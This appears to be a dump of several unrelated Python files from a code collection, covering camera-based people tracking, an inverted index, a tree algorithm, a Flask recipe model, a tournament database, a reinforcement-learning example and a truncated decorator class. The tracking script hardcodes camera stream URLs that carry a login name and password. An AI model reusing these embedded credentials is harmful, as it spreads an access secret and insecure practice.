cv2\nprint(cv2.__version__)\nfrom threading import Thread\nfrom people import Tracking\nimport copy\nimport time\nframes = []\n\ndef readframes_(caps):\n global frames\n ind = 0\n while True:\n t1 = time.time()\n cam_no = ind%3\n ind += 1\n for i, cap in enumerate(caps):\n cap.grab()\n t2 = time.time()\n print('grab time is: ', t2-t1)\n\n if cam_no < len(caps):\n ret, frame = caps[cam_no].retrieve()\n frames.append((frame, cam_no))\n print(\"frames len: {}, cap camera {}, time: {}\".format(len(frames), cam_no, time.time()))\n t3 = time.time()\n print('read time is:', t3-t2)\n else:\n #time.sleep(0.03)\n pass\n\n\ndef readframes(caps):\n global frames\n i = -1\n while True:\n i += 1\n for ind, cap in enumerate(caps):\n ret, frame = cap.read()\n if ret:\n if i % 10 == 0:\n frames.append((frame, ind))\n\n print(\"frames len: {} cap is {} time is {}\".format(len(frames), ind, time.time()))\n else:\n print('cap {} ret is False'.format(ind))\n\n\ndef main():\n area = [500, 1000, 400, 1200]\n\n urls = [#\"rtsp://admin:wsy001@192.168.10.8:554/cam/realmonitor?channel=1&subtype=0 \",\n #\"rtsp://admin:wsy001@192.168.10.8:554/cam/realmonitor?channel=2&subtype=0 \",\n \"rtsp://admin:wsy001@192.168.10.8:554/cam/realmonitor?channel=3&subtype=0 \",\n #\"rtsp://admin:wsy001@192.168.10.8:554/cam/realmonitor?channel=4&subtype=0 \"\n ]\n\n caps = []\n for url in urls:\n caps.append(cv2.VideoCapture(url))\n\n for i, cap in enumerate(caps):\n if not cap.isOpened():\n print(\"camera not opened\")\n \n featmodel = 'model_data/mars-small128.pb'\n tracking = Tracking(featmodel, len(urls), 2)\n im = cv2.imread('first.jpg')\n #for i in range(len(urls)):\n result = tracking.tracking_people(im, len(urls), [])\n \n thread = Thread(target=readframes_, args=(caps, ))\n thread.setDaemon(True)\n thread.start()\n\n while True:\n if frames != []:\n starttime = time.time()\n frame = frames[0]\n print('process:', frame[1])\n print('image shape: ',frame[0].shape)\n #crop_image = frame[0][area[0]:area[1],area[2]:area[3],:]\n result = tracking.tracking_people(frame[0], frame[1], area)\n #result = frame[0]\n windowname = str(frame[1])\n #cv2.imwrite('result.jpg', result)\n cv2.imshow(windowname, result)\n frames.remove(frames[0])\n endtime = time.time()\n print('tracking time is: ', endtime - starttime)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"tracking_old.py","file_name":"tracking_old.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275102135","text":"# Stanford: Tokens: 25 000 000 et taukke 400 000\nimport re,math, os, collections,sys,time\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom multiprocessing import Manager, Pool\n\n\nclass corpus_cs276:\n\n def __init__(self,nbr_of_folders):\n self.nbr_of_folders=nbr_of_folders\n self.tokens,self.dic_docs,self.dic_termes = self.traitement_corpus() #C'est un grand tableau de tuples (term_id,doc_id)\n self.length_tokens = len(self.tokens)\n self.vocabulary = collections.Counter(x[0] for x in self.tokens)\n self.length_voc = len(self.vocabulary)\n\n def traitement_corpus(self):\n \"\"\"\n Cette fonction renvoie:\n - une liste de tuples (word_id,doc_id)\n - Le dictionnaire matchant word a word_id\n - Le dictonnaire matchant doc a doc_id\n \"\"\"\n j=0\n k=0\n content_parsed = []\n dic_docs={}\n dic_termes={}\n for i in range (0,self.nbr_of_folders):\n for file_name in os.listdir('data/cs276/'+str(i)):\n with open('data/cs276/'+str(i)+'/'+file_name,'r') as f:\n doc_id = j\n dic_docs[file_name]=doc_id\n j=j+1\n content = f.read()\n words = word_tokenize(content)\n for w in words:\n if w not in dic_termes:\n w_id = k\n dic_termes[w]=w_id\n k=k+1\n content_parsed.append((w_id,doc_id))\n return content_parsed,dic_docs,dic_termes\n\n\n def map(self,partition):\n \"\"\"\n Fonction map qui ajoute a un dictionnaire dont les clefs sont les mots des elements du type (Doc_id,1)\n\n \"\"\"\n map_index={}\n for word in partition:\n if word[0] not in map_index:\n map_index[word[0]]=[]\n map_index[word[0]].append((word[1],1))\n return map_index\n\n\n def reduce(self,partition,index_inv_final):\n \"\"\"\n La fonction reduce renvoie un dictionnaire dont les clefs sont les mots.\n Les valeurs sont elles memes des dictonnaires dont les clefs sont les doc_id et les valeurs le nombre d'apparition\n \"\"\"\n for word in partition:\n if word not in index_inv_final:\n index_inv_final[word]={}\n for elem in partition[word]:\n doc_id=elem[0]\n cnt = elem[1]\n if doc_id in index_inv_final[word]:\n index_inv_final[word][doc_id]=index_inv_final[word][doc_id]+cnt\n else:\n index_inv_final[word][doc_id]=cnt\n return index_inv_final\n\n def shuffle(self):\n \"\"\"\n Create three different clusters of tokens\n \"\"\"\n partition={}\n partition[1]=[]\n partition[2]=[]\n partition[3]=[]\n for w in self.tokens:\n if w[0]%3==0:\n partition[1].append(w)\n elif w[0]%3==1:\n partition[2].append(w)\n elif w[0]%3==2:\n partition[3].append(w)\n return partition\n\n def map_reduce_index(self):\n \"\"\"\n On commence par regrouper les tokens dans les clusters suivants par ordre alphabetique:\n \"\"\"\n index_inv={}\n partition=self.shuffle()\n # On applique la fonction map sur chacun des clusters\n for part in partition:\n index_inv[part]=self.map(partition[part])\n # On applique la fonction reduce aux clusters et on fait grossir notre index inverse finale\n index_inv_final={}\n for part in index_inv:\n index_inv_final=self.reduce(index_inv[part],index_inv_final)\n return index_inv_final\n","sub_path":"lib/utils_cs276.py","file_name":"utils_cs276.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"649627720","text":"from pprint import pprint\n\n\n# Definition for a binary tree node\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n#\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param head, a list node\n # @return a tree node\n def sortedListToBST(self, head):\n if head == None: return head\n length = 0\n liter = head\n while liter != None:\n length += 1\n liter = liter.next\n if length == 1: return TreeNode(head.val)\n lefthead, righthead = head, None\n mid = head\n prev = None\n for i in xrange(length/2):\n prev = mid\n mid = mid.next\n righthead = mid.next\n prev.next = None\n node = TreeNode(mid.val)\n node.left = self.sortedListToBST(lefthead)\n node.right = self.sortedListToBST(righthead)\n return node\n\nif __name__ == '__main__':\n n = input('Please enter the number of elements in the sorted list: ')\n sentinel = ListNode(-1)\n for i in xrange(n):\n ele = input('Please enter the value of the element: ')\n node = ListNode(ele)\n node.next = sentinel.next\n sentinel.next = node\n solution = Solution()\n root = solution.sortedListToBST(sentinel.next)\n def printTree(head):\n if head == None: return \n printTree(head.left)\n pprint('current value: %d' % head.val)\n printTree(head.right)\n printTree(root)","sub_path":"listbst.py","file_name":"listbst.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"200253096","text":"# regex_search.py - Regex Search all .txt files in cwd\n\n\"\"\"\nWrite a program that opens all .txt files in a folder and searches for any \nline that matches a user-supplied regular expression. The results should \nbe printed to the screen.\n\"\"\"\n\nimport os, re\n\ncurrent_dir = os.getcwd() + \"\\\\\"\n\nlist_of_items = os.listdir(current_dir)\nnumber_of_text_files = 0\n\nfor file in list_of_items:\n if file.endswith(\".txt\") and os.path.isfile(current_dir + file):\n number_of_text_files += 1\n\nif number_of_text_files == 0:\n print(\"No text files found in current directory.\")\nelse:\n print(\"Enter a regular expression:\")\n user_regex = input()\n regex = re.compile(user_regex)\n for file in list_of_items:\n if file.endswith(\".txt\") and os.path.isfile(current_dir + file):\n current_file = open(current_dir + file)\n current_file_contents = current_file.read()\n regex_match = re.findall(regex, current_file_contents)\n if len(regex_match) > 0:\n print(\n file\n + \": \"\n + str(len(regex_match))\n + ' occurences matching \"'\n + user_regex\n + '\"'\n )\n\n","sub_path":"FileManipulation/RegexSearch/regex_search.py","file_name":"regex_search.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39773932","text":"from flask_app.config.MySQLConnection import connectToMySQL\nfrom flask import flash\nfrom flask_app.models import users\n\n\n\nclass Recipes:\n def __init__(self, data):\n self.id = data[\"id\"]\n self.dish_name = data[\"dish_name\"]\n self.dish_description = data[\"dish_description\"]\n self.dish_time = data[\"dish_time\"]\n self.dish_instructions = data[\"dish_instructions\"]\n self.user_id = data[\"user_id\"]\n self.created_at = data[\"created_at\"]\n self.updated_at = data[\"updated_at\"]\n\n self.owner = {}\n\n @staticmethod\n def verify_recipes(my_recipes):\n is_valid = True\n\n if len(my_recipes['dish_name']) < 3:\n flash(\"Title must be at least 3 characters long!\")\n is_valid = False\n\n if len(my_recipes['dish_description']) < 3:\n flash(\"Description must be at least 3 characters long!\")\n is_valid = False\n\n if len(my_recipes['dish_instructions']) < 3:\n flash(\"Description must be at least 3 characters long!\")\n is_valid = False\n\n return is_valid\n\n @classmethod\n def insert_recipe(cls, data):\n query = \"INSERT INTO recipes (dish_name, dish_description, dish_time, dish_instructions, user_id, created_at, updated_at) VALUES (%(dish_name)s, %(dish_description)s, %(dish_time)s, %(dish_instructions)s, %(user_id)s, NOW(), NOW());\"\n results = connectToMySQL(\"recipes_schema\").query_db(query, data)\n return results\n\n @classmethod\n def users_with_recipes(cls):\n query = \"SELECT * FROM recipes LEFT JOIN users ON recipes.user_id = users.id;\"\n results = connectToMySQL(\"recipes_schema\").query_db(query)\n\n all_recipes = []\n\n for row in results:\n one_recipe = cls(row)\n user_data = {\n \"id\" : row['users.id'],\n \"first_name\" : row['first_name'],\n \"last_name\" : row['last_name'],\n \"email\" : row['email'],\n \"password\" : row['password'],\n \"created_at\" : row['users.created_at'],\n \"updated_at\" : row['users.updated_at'],\n }\n one_recipe.owner = users.Users(user_data)\n all_recipes.append(one_recipe)\n return all_recipes\n\n @classmethod\n def one_user_one_recipe(cls, data):\n query = \"SELECT * FROM recipes LEFT JOIN users ON recipes.user_id = users.id WHERE recipes.id = %(recipe_id)s;\"\n results = connectToMySQL(\"recipes_schema\").query_db(query, data)\n\n one_recipe = cls(results[0])\n\n user_data = {\n \"id\" : results[0]['users.id'],\n \"first_name\" : results[0]['first_name'],\n \"last_name\" : results[0]['last_name'],\n \"email\" : results[0]['email'],\n \"password\" : results[0]['password'],\n \"created_at\" : results[0]['users.created_at'],\n \"updated_at\" : results[0]['users.updated_at'],\n }\n\n one_recipe.owner = users.Users(user_data)\n return one_recipe\n\n @classmethod\n def update_recipe(cls, data):\n query = \"UPDATE recipes SET dish_name = %(dish_name)s, dish_description = %(dish_description)s, dish_time = %(dish_time)s, dish_instructions = %(dish_instructions)s, updated_at = NOW() WHERE id = %(recipe_id)s;\"\n results = connectToMySQL(\"recipes_schema\").query_db(query, data)\n return \n \n @classmethod\n def delete_recipe(cls, data):\n query = \"DELETE FROM recipes WHERE id=%(recipe_id)s;\"\n results = connectToMySQL(\"recipes_schema\").query_db(query, data)\n return","sub_path":"flask_app/models/recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205453178","text":"#!/usr/bin/env python\n# \n# tournament.py -- implementation of a Swiss-system tournament\n#\n\nimport psycopg2\n\n\ndef connect():\n \"\"\"Connect to the PostgreSQL database. Returns a database connection.\"\"\"\n return psycopg2.connect(\"dbname=tournament\")\n\ndef deleteMatches():\n \"\"\"Remove all the match records from the database.\"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'UPDATE standings SET wins = 0, matches = 0')\n db.commit()\n db.close()\n\ndef deletePlayers():\n \"\"\"Remove all the player records from the database.\"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'DELETE FROM standings *')\n cursor.execute( 'DELETE FROM players *')\n db.commit()\n db.close()\n\ndef countPlayers():\n \"\"\"Returns the number of players currently registered.\"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'SELECT count(*) FROM players')\n count = cursor.fetchone()[0]\n db.close()\n return count\n\n\ndef registerPlayer(name):\n \"\"\"Adds a player to the tournament database.\n \n The database assigns a unique serial id number for the player. (This\n should be handled by your SQL database schema, not in your Python code.)\n \n Args:\n name: the player's full name (need not be unique).\n \"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'INSERT INTO players (name) '\n 'VALUES(%s)', (name,))\n cursor.execute( 'INSERT INTO standings (id_num) '\n 'SELECT players.id_num '\n 'FROM players '\n 'WHERE players.name = (%s)', (name,))\n db.commit()\n db.close()\n \ndef playerStandings():\n \"\"\"Returns a list of the players and their win records, sorted by wins.\n\n The first entry in the list should be the player in first place, or a player\n tied for first place if there is currently a tie.\n\n Returns:\n A list of tuples, each of which contains (id, name, wins, matches):\n id: the player's unique id (assigned by the database)\n name: the player's full name (as registered)\n wins: the number of matches the player has won\n matches: the number of matches the player has played\n \"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'SELECT * FROM swissPairings')\n standings = cursor.fetchall()\n db.close()\n return standings\n\ndef reportMatch(winner, loser):\n \"\"\"Records the outcome of a single match between two players.\n\n Args:\n winner: the id number of the player who won\n loser: the id number of the player who lost\n \"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'UPDATE standings '\n 'SET wins = wins + 1, '\n 'matches = matches + 1 '\n 'WHERE id_num = (%s)', (winner,))\n cursor.execute( 'UPDATE standings '\n 'SET matches = matches + 1 '\n 'WHERE id_num = (%s)', (loser,))\n db.commit()\n db.close()\n \ndef swissPairings():\n \"\"\"Returns a list of pairs of players for the next round of a match.\n \n Assuming that there are an even number of players registered, each player\n appears exactly once in the pairings. Each player is paired with another\n player with an equal or nearly-equal win record, that is, a player adjacent\n to him or her in the standings.\n \n Returns:\n A list of tuples, each of which contains (id1, name1, id2, name2)\n id1: the first player's unique id\n name1: the first player's name\n id2: the second player's unique id\n name2: the second player's name\n \"\"\"\n db = connect()\n cursor = db.cursor()\n cursor.execute( 'SELECT a.id_num, a.name, b.id_num, b.name '\n 'FROM swissPairings AS a, swissPairings AS b '\n 'WHERE a.wins = b.wins '\n 'AND a.id_num > b.id_num')\n swissPairings = cursor.fetchall()\n db.close()\n return swissPairings\n","sub_path":"tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"577303864","text":"\"\"\"Provide a Very naive utility to simulate random chunks of survey data.\"\"\"\n\nimport gzip\n# import itertools\nimport json\nimport os\nimport random\nimport sys\nimport uuid\n\nimport constants\n\n\ndef main():\n \"\"\"Start the ball rolling.\"\"\"\n os.makedirs(\"../json-data\", exist_ok=True)\n # num_docs = 1005\n num_docs = int(sys.argv[1])\n for answerno in range(num_docs):\n print('Creating document', answerno, 'of', num_docs)\n basename = \"../json-data/chunck_%s\" % uuid.uuid4()\n tempname = basename + '.temp.gz'\n longtermname = basename + '.json.gz'\n\n # We compress with gzip.\n # It's relatively fast compression.\n # We could compress with bzip2 or zlib instead if we have the CPU time available.\n # We could do bits and bytes, but that's harder to debug, and only worth it if there's a LOT of data to store.\n # We could eliminate all unanswered responses, but that is a little prone to surprises.\n # We also have the option of using bson instead of json.\n with gzip.open(tempname, \"w\") as answerfile:\n row = {\"pk\": \"%d\" % answerno}\n for carvar in constants.carvars:\n row[carvar] = random.choice(constants.carbrands)\n for carvar in constants.mrcarvars:\n for carbrand in constants.carbrands:\n row[\"%s.%s\" % (carvar, carbrand)] = random.choice(constants.answers)\n for singvar in constants.singervars:\n row[singvar] = random.choice(constants.singers)\n for singvar in constants.mrsingervars:\n for singer in constants.singers:\n row[\"%s.%s\" % (singvar, singer)] = random.choice(constants.answers)\n string = json.dumps(row)\n answerfile.write(string.encode('UTF-8'))\n os.rename(tempname, longtermname)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"data/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283153880","text":"\"\"\"An example of training DQfD for OpenAI gym Environments.\r\n\"\"\"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\nfrom __future__ import unicode_literals\r\n\r\nimport argparse\r\nimport os\r\nfrom builtins import * # NOQA\r\n\r\nimport chainer\r\nimport chainer.functions as F\r\n\r\nimport chainerrl\r\n\r\nfrom chainerrl import experiments\r\nfrom chainerrl.agents.dqfd import DQfD, PrioritizedDemoReplayBuffer\r\n\r\nfrom future import standard_library\r\nstandard_library.install_aliases() # NOQA\r\n\r\nimport gym\r\n\r\nimport numpy as np\r\n\r\n\r\ndef main():\r\n \"\"\"Parses arguments and runs the example\r\n \"\"\"\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--env', type=str, default='CartPole-v1',\r\n help='Gym environment to run the example on')\r\n parser.add_argument('--outdir', type=str, default='results',\r\n help='Directory path to save output files.'\r\n ' If it does not exist, it will be created.')\r\n parser.add_argument('--seed', type=int, default=0)\r\n parser.add_argument('--gpu', type=int, default=-1,\r\n help='GPU to use, set to -1 if no GPU.')\r\n parser.add_argument('--final-exploration-frames',\r\n type=int, default=4000,\r\n help='Timesteps after which we stop ' +\r\n 'annealing exploration rate')\r\n parser.add_argument('--final-epsilon', type=float, default=0.02,\r\n help='Final value of epsilon during training.')\r\n parser.add_argument('--eval-epsilon', type=float, default=0.01,\r\n help='Exploration epsilon used during eval episodes.')\r\n parser.add_argument('--steps', type=int, default=15000,\r\n help='Total number of timesteps to train the agent.')\r\n parser.add_argument('--replay-start-size', type=int, default=1000,\r\n help='Minimum replay buffer size before ' +\r\n 'performing gradient updates.')\r\n parser.add_argument('--target-update-interval', type=int, default=200,\r\n help='Frequency (in timesteps) at which ' +\r\n 'the target network is updated.')\r\n parser.add_argument('--eval-interval', type=int, default=100,\r\n help='Frequency (in timesteps) of evaluation phase.')\r\n parser.add_argument('--update-interval', type=int, default=1,\r\n help='Frequency (in timesteps) of network updates.')\r\n parser.add_argument('--eval-n-runs', type=int, default=10)\r\n parser.add_argument('--no-clip-delta',\r\n dest='clip_delta', action='store_false')\r\n parser.add_argument('--num-step-return', type=int, default=3)\r\n parser.set_defaults(clip_delta=True)\r\n parser.add_argument('--logging-level', type=int, default=20,\r\n help='Logging level. 10:DEBUG, 20:INFO etc.')\r\n parser.add_argument('--render-train', action='store_true')\r\n parser.add_argument('--render-eval', action='store_true')\r\n parser.add_argument('--monitor', action='store_true')\r\n parser.add_argument('--lr', type=float, default=5e-4, help='Learning rate')\r\n parser.add_argument(\"--replay-buffer-size\", type=int, default=50000,\r\n help=\"Size of replay buffer (w/o demonstrations)\")\r\n parser.add_argument(\"--minibatch-size\", type=int, default=32)\r\n parser.add_argument('--demo', action='store_true', default=False)\r\n parser.add_argument('--load', type=str, default=None)\r\n parser.add_argument(\"--save-demo-trajectories\", action=\"store_true\",\r\n default=False)\r\n parser.add_argument('--reward-scale-factor', type=float, default=1.0)\r\n parser.add_argument(\"--n-hidden-channels\", type=int, default=64)\r\n parser.add_argument(\"--n-hidden-layers\", type=int, default=2)\r\n\r\n # DQfD specific parameters for loading and pretraining.\r\n parser.add_argument('--expert-demo-path', type=str, default=None)\r\n parser.add_argument('--n-pretrain-steps', type=int, default=1500)\r\n parser.add_argument('--demo-supervised-margin', type=float, default=0.8)\r\n parser.add_argument('--loss-coeff-l2', type=float, default=1e-5)\r\n parser.add_argument('--loss-coeff-nstep', type=float, default=1.0)\r\n parser.add_argument('--loss-coeff-supervised', type=float, default=1.0)\r\n parser.add_argument('--bonus-priority-agent', type=float, default=0.001)\r\n parser.add_argument('--bonus-priority-demo', type=float, default=1.0)\r\n parser.add_argument('--priority-error-max', type=float, default=2.0)\r\n args = parser.parse_args()\r\n\r\n assert args.expert_demo_path is not None, \"DQfD needs collected \\\r\n expert demonstrations\"\r\n\r\n import logging\r\n logging.basicConfig(level=args.logging_level)\r\n\r\n train_seed = args.seed\r\n test_seed = 2 ** 31 - 1 - args.seed\r\n\r\n chainerrl.misc.set_random_seed(args.seed, gpus=(args.gpu,))\r\n\r\n args.outdir = chainerrl.experiments.prepare_output_dir(\r\n args, args.outdir)\r\n print('Output files are saved in {}'.format(args.outdir))\r\n\r\n def make_env(test):\r\n \"\"\"Makes and seeds the environment\r\n \"\"\"\r\n env = gym.make(args.env)\r\n\r\n env_seed = test_seed if test else train_seed\r\n env.seed(env_seed)\r\n\r\n # Cast observations to float32 because our model uses float32\r\n # env = chainerrl.wrappers.CastObservationToFloat32(env)\r\n # if args.monitor:\r\n # env = gym.wrappers.Monitor(env, args.outdir)\r\n # if not test:\r\n # Scale rewards (and thus returns) to a reasonable range so that\r\n # training is easier\r\n # env = chainerrl.wrappers.ScaleReward(env, args.reward_scale_factor)\r\n # if ((args.render_eval and test) or\r\n # (args.render_train and not test)):\r\n # env = chainerrl.wrappers.Render(env)\r\n return env\r\n\r\n env = make_env(test=False)\r\n eval_env = make_env(test=True)\r\n\r\n q_func = chainerrl.q_functions.FCStateQFunctionWithDiscreteAction(\r\n ndim_obs=env.observation_space.low.size,\r\n n_actions=env.action_space.n,\r\n n_hidden_channels=args.n_hidden_channels,\r\n n_hidden_layers=args.n_hidden_layers,\r\n nonlinearity=F.relu)\r\n\r\n explorer = chainerrl.explorers.LinearDecayEpsilonGreedy(\r\n 1.0, args.final_epsilon,\r\n args.final_exploration_frames,\r\n lambda: np.random.randint(env.action_space.n))\r\n\r\n # Draw the computational graph and save it in the output directory.\r\n chainerrl.misc.draw_computational_graph(\r\n [q_func(env.observation_space.sample()[None])],\r\n os.path.join(args.outdir, 'model'))\r\n\r\n opt = chainer.optimizers.Adam(args.lr)\r\n opt.setup(q_func)\r\n betasteps = args.steps / args.update_interval\r\n replay_buffer = PrioritizedDemoReplayBuffer(\r\n args.replay_buffer_size, alpha=0.6,\r\n beta0=0.4, betasteps=betasteps, error_max=args.priority_error_max,\r\n num_steps=args.num_step_return)\r\n\r\n # Fill the demo buffer with expert transitions\r\n n_demo_transitions = 0\r\n with chainer.datasets.open_pickle_dataset(args.expert_demo_path) as dset:\r\n for transition in dset:\r\n (obs, a, r, new_obs, done, info) = transition\r\n n_demo_transitions += 1\r\n replay_buffer.append(state=obs,\r\n action=a,\r\n reward=r,\r\n next_state=new_obs,\r\n next_action=None,\r\n is_state_terminal=done,\r\n demo=True)\r\n if (\"needs_reset\" in info and info[\"needs_reset\"]):\r\n replay_buffer.stop_current_episode(demo=True)\r\n print(\"Demo buffer loaded with %d (1 and n-step) transitions from \"\r\n \"%d expert demonstration transitions\" % (len(replay_buffer),\r\n n_demo_transitions))\r\n\r\n def phi(x):\r\n # Feature extractor\r\n return np.asarray(x, dtype=np.float32)\r\n\r\n agent = DQfD(q_func, opt, replay_buffer,\r\n gamma=0.99,\r\n explorer=explorer,\r\n n_pretrain_steps=args.n_pretrain_steps,\r\n demo_supervised_margin=args.demo_supervised_margin,\r\n bonus_priority_agent=args.bonus_priority_agent,\r\n bonus_priority_demo=args.bonus_priority_demo,\r\n loss_coeff_nstep=args.loss_coeff_nstep,\r\n loss_coeff_supervised=args.loss_coeff_supervised,\r\n loss_coeff_l2=args.loss_coeff_l2,\r\n gpu=args.gpu,\r\n replay_start_size=args.replay_start_size,\r\n target_update_interval=args.target_update_interval,\r\n clip_delta=args.clip_delta,\r\n update_interval=args.update_interval,\r\n batch_accumulator='sum',\r\n phi=phi, minibatch_size=args.minibatch_size)\r\n\r\n if args.load:\r\n agent.load(args.load)\r\n\r\n if args.demo:\r\n eval_stats = experiments.eval_performance(\r\n env=eval_env,\r\n agent=agent,\r\n n_steps=None,\r\n n_episodes=args.eval_n_runs)\r\n print('n_runs: {} mean: {} median: {} stdev {}'.format(\r\n args.eval_n_runs, eval_stats['mean'], eval_stats['median'],\r\n eval_stats['stdev']))\r\n else:\r\n logger = logging.getLogger(__name__)\r\n evaluator = experiments.Evaluator(agent=agent,\r\n n_steps=None,\r\n n_episodes=args.eval_n_runs,\r\n eval_interval=args.eval_interval,\r\n outdir=args.outdir,\r\n max_episode_len=None,\r\n env=eval_env,\r\n step_offset=0,\r\n save_best_so_far_agent=True,\r\n logger=logger)\r\n\r\n # Evaluate the agent BEFORE training begins\r\n evaluator.evaluate_and_update_max_score(t=0, episodes=0)\r\n experiments.train_agent(agent=agent,\r\n env=env,\r\n steps=args.steps,\r\n outdir=args.outdir,\r\n max_episode_len=None,\r\n step_offset=0,\r\n evaluator=evaluator,\r\n successful_score=None,\r\n step_hooks=[])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"general/chainerrl/chainerrl/examples/gym/train_dqfd_gym.py","file_name":"train_dqfd_gym.py","file_ext":"py","file_size_in_byte":10799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435604411","text":"\n\nfrom xai.brain.wordbase.nouns._container import _CONTAINER\n\n#calss header\nclass _CONTAINERS(_CONTAINER, ):\n\tdef __init__(self,): \n\t\t_CONTAINER.__init__(self)\n\t\tself.name = \"CONTAINERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"container\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_containers.py","file_name":"_containers.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233971209","text":"#\nimport collections\nimport copy\nimport inspect\nimport os\nimport ShareYourSystem as SYS\nimport sys\n#\n\n#\nHookingBeforeString='Before'\nHookingAfterString='After'\n#\n\n#\ndef getSettedHookedListWithInstanceVariable(_HookedList,_InstanceVariable):\n\n\t#Debug\n\t'''\n\tprint('HookedList is '+str(_HookedList))\n\tprint('')\n\t'''\n\n\t#Set first the class \n\tif _HookedList[0]==\"\":\n\t\t_HookedList[0]=_InstanceVariable.__class__\n\telif _HookedList[0]==\"\":\t\n\t\t_HookedList[0]=_InstanceVariable.__class__.__bases__[0]\n\telif type(_HookedList[0])==str:\n\t\t_HookedList[0]=getattr(\n\t\t\t\t\t\t\t\tSYS,\n\t\t\t\t\t\t\t\tSYS.getClassStringWithTypeString(_HookedList[0])\n\t\t\t\t\t\t\t\t)\n\n\t#Set then the method\n\tif type(_HookedList[1])==str and hasattr(_HookedList[0],_HookedList[1]):\n\t\t_HookedList[1]=getattr(_HookedList[0],_HookedList[1])\n\n\t#Return the list\n\treturn _HookedList\n\n\n#\n\n#\nclass HookerClass(SYS.DoerClass):\n\tdef __init__(self,**_VariablesDict):\n\n\t\t#Call the parent init method\n\t\tSYS.DoerClass.__init__(self)\n\n\t\t#\n\t\tself.HookingFunction=None\n\t\tself.HookingBeforeTuplesList=[]\n\t\tself.HookingAfterTuplesList=[]\n\t\tself.HookedBeforeTuplesList=[]\n\t\tself.HookedAfterTuplesList=[]\n\t\tself.HookingUniqueBool=True\n\t\tself.HookedFunctionString=\"\"\n\t\tself.HookedBeforeFunctionsList=[]\n\t\tself.HookedAfterFunctionsList=[]\n\t\tself.HookedFunction=None\n\t\tself.HookedClass=None\n\t\tself.HookedIsBool=False\n\t\t#\n\n\t\t#Update with the Kwargs\n\t\tmap(\n\t\t\t\tlambda __ItemTuple:\n\t\t\t\tself.__setattr__('Hooking'+__ItemTuple[0],__ItemTuple[1]),\n\t\t\t\t_VariablesDict.iteritems()\n\t\t\t)\n\n\tdef __call__(self,_HookingFunction):\n\n\t\t#Hook\n\t\tself.hook(_HookingFunction)\n\n\t\t#Return the HookedFunction\n\t\treturn self.HookedFunction\n\n\tdef hook(self,_HookingFunction):\n\n\t\t#Set the HookedFunction\n\t\tself.HookingFunction=_HookingFunction\t\n\n\t\t#Set the HookedFunctionString\n\t\tself.HookedFunctionString=_HookingFunction.__name__\n\n\t\t#Define the WrappedFunction\n\t\tdef HookedFunction(*_VariablesList,**_VariablesDict):\n\n\t\t\t#Debug\n\t\t\t'''\n\t\t\tprint('Debugger l.88 : Start of the method')\n\t\t\tprint('')\n\t\t\t'''\n\n\t\t\t#Define an alias of the instance\n\t\t\tInstanceVariable=_VariablesList[0]\n\n\t\t\t#Init maybe the _VariablesDict\n\t\t\tif 'HookingIsBool' not in _VariablesDict:\n\t\t\t\t_VariablesDict['HookingIsBool']=True\n\t\t\t\t_VariablesDict['HookedFunctionsList']=[]\n\t\t\t\t_VariablesDict['HookingUniqueBool']=self.HookingUniqueBool\n\n\t\t\t#Init maybe the hooking classes and functions for the first call\n\t\t\tif self.HookedIsBool==False:\n\n\t\t\t\t#Set to the HookerPointer the corresponding class\n\t\t\t\tself.HookedClass=InstanceVariable.__class__\n\n\t\t\t\t#Set the name\n\t\t\t\tself.__class__.__name__=self.HookedClass.__name__\n\n\t\t\t\t#Debug\n\t\t\t\t'''\n\t\t\t\tprint('We have to first set in the class the hooking classes and corresponding functions')\n\t\t\t\tprint(str(self.HookingFunction))\n\t\t\t\tprint(str([self.HookingBeforeTuplesList,self.HookingAfterTuplesList]))\n\t\t\t\tprint('')\n\t\t\t\t'''\n\n\t\t\t\t#Set the self.HookedBeforeClass,self.HookedAfterClass\n\t\t\t\t[self.HookedBeforeTuplesList,self.HookedAfterTuplesList]=map(\n\t\t\t\t\tlambda __HookingTuplesList:\n\t\t\t\t\tmap(\n\t\t\t\t\t\t\tlambda 